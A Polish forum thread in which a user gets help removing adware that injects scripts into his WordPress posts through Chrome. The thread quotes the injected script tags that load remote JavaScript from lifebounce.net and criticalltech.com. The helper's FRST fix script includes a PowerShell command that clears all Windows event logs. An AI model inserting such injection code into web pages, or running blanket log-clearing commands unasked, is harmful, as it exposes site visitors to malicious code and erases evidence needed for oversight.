Skocz do zawartości
kapees

Dziwny problem - lifebounce.net - malware-gen

Rekomendowane odpowiedzi

Witam,

 

Od jakiegoś czasu, jestem katowany jakimiś powiadomieniami o lifebounce.net, nie wiem co to jest,

ale avast ciągle to wykrywa.

 

Jest jeszcze jedna ciekawostka.

 

Jak dodaje coś na stronę w wordpresie to do każdego bloku tekstowego dorzuca mi taki skrypt:

 

<script src="//lifebounce.net/1f9f5ee62aefca3cb1.js" async="" type="text/javascript"></script><script src="https://criticalltech.com/optout/set/lat?jsonp=__mtz_cb_961933784&key=1f9f5ee62aefca3cb1&cv=1576401238&t=1576401237963" type="text/javascript"></script><script src="https://criticalltech.com/optout/set/lt?jsonp=__mtz_cb_456350096&key=1f9f5ee62aefca3cb1&cv=11063&t=1576401237964" type="text/javascript"></script>

 

Jak robię to samo na firefox nic się nie dodaje.

 

Proszę o pomoc, bo nie wiem co z tym zrobić.

 

Plik addition: https://pastebin.com/JetyASKw

 

Plik Shortcut: https://pastebin.com/TnTWeEFf

 

Pozdrawiam

Krzysiek

FRST.txt

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

W logach nie ma niczego podejrzanego.

 

Tylko kosmetyka:

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

RemoveDirectory: C:\Users\kps\AppData\Roaming\Search Protection

RemoveDirectory: C:\Users\kps\AppData\Roaming\Yontoo

Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}

FirewallRules: [{090D77D1-625A-4D2E-969D-7EF7603902B4}] => (Allow) C:\Users\kps\AppData\Roaming\Zoom\bin\airhost.exe Brak pliku

FirewallRules: [{11AA4855-13E8-4FBD-AA63-A681B9D93F89}] => (Allow) C:\Program Files\KeyShot5\bin\keyshot5.exe Brak pliku

FirewallRules: [{C7A98B0D-2B70-4F06-BD29-E4C8B58A1867}] => (Allow) C:\Program Files\KeyShot5\bin\keyshot_daemon.exe Brak pliku

FirewallRules: [{AD5C1E10-D6E0-44C7-A73D-C21D9E33CA4E}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe Brak pliku

FirewallRules: [{7A7F9170-C371-49D8-A15F-67CC3ED144CB}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe Brak pliku

FirewallRules: [{E138BB57-D9D5-43F9-BDD1-354F258E4D8A}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe Brak pliku

FirewallRules: [{B84626AE-ADA4-4C24-8CB0-70693D114B96}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe Brak pliku

FirewallRules: [{B4438375-205A-4900-9320-68F4564C69B8}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku

FirewallRules: [{01A5AC70-F18C-430C-B04B-BEDE8696B85B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku

FirewallRules: [TCP Query User{066E4F19-52A3-42A3-8055-91D1E71AD355}C:\xampp\mercurymail\mercury.exe] => (Allow) C:\xampp\mercurymail\mercury.exe Brak pliku

FirewallRules: [uDP Query User{FCD4CBE4-840D-448A-AF5E-BF97D14C5D83}C:\xampp\mercurymail\mercury.exe] => (Allow) C:\xampp\mercurymail\mercury.exe Brak pliku

FirewallRules: [{329C0A98-C7C0-4D67-990C-65B6B691EFFC}] => (Allow) C:\Users\kps\AppData\Roaming\Spotify\spotify.exe Brak pliku

FirewallRules: [{3BE1A80B-B1EC-4DDE-9826-3723D0A0E374}] => (Allow) C:\Users\kps\AppData\Roaming\Spotify\spotify.exe Brak pliku

FirewallRules: [{0AB98311-2ED2-4B9A-92B4-C8C804B39029}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe Brak pliku

FirewallRules: [{3AD67A7F-5364-4BE0-AA0E-7F6BC10650D5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe Brak pliku

FirewallRules: [{D418C6F6-CC98-462F-B691-1BC02EE37911}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe Brak pliku

FirewallRules: [{DC59B32B-9128-46DF-AD41-4A4F627349BB}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe Brak pliku

FirewallRules: [{A6795F4C-9527-4D8C-8E1E-4095434ACC51}] => (Allow) C:\Program Files (x86)\Trademanager\AliIM.exe Brak pliku

FirewallRules: [{AEE901BC-FBAA-49D6-A024-5AAA365C3F8D}] => (Allow) C:\Program Files (x86)\Trademanager\AliIM.exe Brak pliku

FirewallRules: [TCP Query User{D26191C1-EA58-46EE-8835-298E6781A31B}C:\program files (x86)\trademanager\aliim.exe] => (Allow) C:\program files (x86)\trademanager\aliim.exe Brak pliku

FirewallRules: [uDP Query User{BF96E82C-82AB-4CA0-967A-E28FFFD18153}C:\program files (x86)\trademanager\aliim.exe] => (Allow) C:\program files (x86)\trademanager\aliim.exe Brak pliku

FirewallRules: [TCP Query User{2EBD5DD4-7B7A-4929-AC91-5DEAB8ED4A55}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe Brak pliku

FirewallRules: [uDP Query User{AE698747-9873-4409-BF80-53C4344FCB0B}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe Brak pliku

FirewallRules: [TCP Query User{1370C1A1-951F-4C33-AAD0-2063F31664B4}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe Brak pliku

FirewallRules: [uDP Query User{BCF736FB-B343-4CFD-8BEA-D0203C0106EF}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe Brak pliku

FirewallRules: [TCP Query User{0373D411-DF15-40C2-AB10-687358545962}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe Brak pliku

FirewallRules: [uDP Query User{D4F10A16-154A-44CF-B11B-817702BA1017}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe Brak pliku

FirewallRules: [TCP Query User{5C840866-5202-4CE9-8E13-D75E73F19D6F}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe Brak pliku

FirewallRules: [uDP Query User{A4D74A3A-ACC4-403E-AE56-BE9597C36170}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe Brak pliku

MSCONFIG\startupreg: Yontoo Desktop => "C:\Users\kps\AppData\Roaming\Yontoo\YontooDesktop.exe"

MSCONFIG\startupreg: SearchProtection => "C:\Users\kps\AppData\Roaming\Search Protection\SearchProtection.EXE" /autostart

Task: {5C9CDCCC-E7F4-4443-B710-FCF8108B5C65} - System32\Tasks\{ABBF335E-C140-46E1-B5B4-D2900D2BC0F7} => C:\Windows\system32\pcalua.exe -a E:\Programy\instalki\xampp-win32-1.7.4-VC6-installer.exe -d E:\Programy\instalki

Task: {8F6F2540-5F2C-4D5D-A209-48978A4C3F02} - System32\Tasks\{F3C4356F-A9D8-468A-9940-B44EBAE05607} => C:\Windows\system32\pcalua.exe -a "C:\Users\kps\Desktop\JRE - Flip Installer - 3.4.7.112.exe" -d C:\Users\kps\Desktop

Task: {C564BD26-B060-4935-9DE9-DEA35E7B67A3} - System32\Tasks\{BC73714B-0B37-4F82-87F9-D21BCFD8D748} => C:\Windows\system32\pcalua.exe -a "C:\Users\kps\Desktop\Hp drivery\sp48432 - chipset instal utility.exe" -d "C:\Users\kps\Desktop\Hp drivery"

URLSearchHook: [s-1-5-21-382856504-3390691762-2710609008-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12152019093740585] UWAGA => Brak domyślnego URLSearchHook

Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku

FF Plugin HKU\S-1-5-21-382856504-3390691762-2710609008-1000: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [brak pliku]

FF Plugin HKU\S-1-5-21-382856504-3390691762-2710609008-1000: @alibaba.com/npAliSSOLogin;version=1.0 -> C:\Program Files (x86)\Trademanager\npAliSSOLogin.dll [brak pliku]

CHR Session Restore: Default -> [funkcja włączona]

S3 WacHidRouter; system32\DRIVERS\wachidrouter.sys [X]

S3 wacomrouterfilter; system32\DRIVERS\wacomrouterfilter.sys [X]

EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

 

F.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Właśnie przed chwilą, znowu wyskoczył mi ten komunikat:

 

Clipboard01.jpg

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Tylko kosmetyka:

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

RemoveDirectory: C:\ProgramData\boost_interprocess

S3 WacHidRouter; system32\DRIVERS\wachidrouter.sys [X]

S3 wacomrouterfilter; system32\DRIVERS\wacomrouterfilter.sys [X]

Task: {8F6F2540-5F2C-4D5D-A209-48978A4C3F02} - System32\Tasks\{F3C4356F-A9D8-468A-9940-B44EBAE05607} => C:\Windows\system32\pcalua.exe -a "C:\Users\kps\Desktop\JRE - Flip Installer - 3.4.7.112.exe" -d C:\Users\kps\Desktop

Task: {5C9CDCCC-E7F4-4443-B710-FCF8108B5C65} - System32\Tasks\{ABBF335E-C140-46E1-B5B4-D2900D2BC0F7} => C:\Windows\system32\pcalua.exe -a E:\Programy\instalki\xampp-win32-1.7.4-VC6-installer.exe -d E:\Programy\instalki

EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

 

Ponieważ Avast wykrył to w Chrome, to przeinstaluj tę przeglądarkę.

 

F.

 

. 111

. .

Edytowane przez filutka78

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Cześć Filutka,

 

Dzięki za pomoc.

Przepraszam że tak długo mi zeszło z kolejnym działaniem.

 

W końcu po nowym roku udało mi się to zrobić:

 

https://pastebin.com/t7ZEWxxt

 

Chroma jeszcze nie przeinstalowałem bo muszę ogarnąć jak nie stracić wszystkich haseł, histori, autouzupełnień itp.

 

Zrobię to na dniach.

 

Pozdrawiam!

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się

  • Ostatnio przeglądający   0 użytkowników

    Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...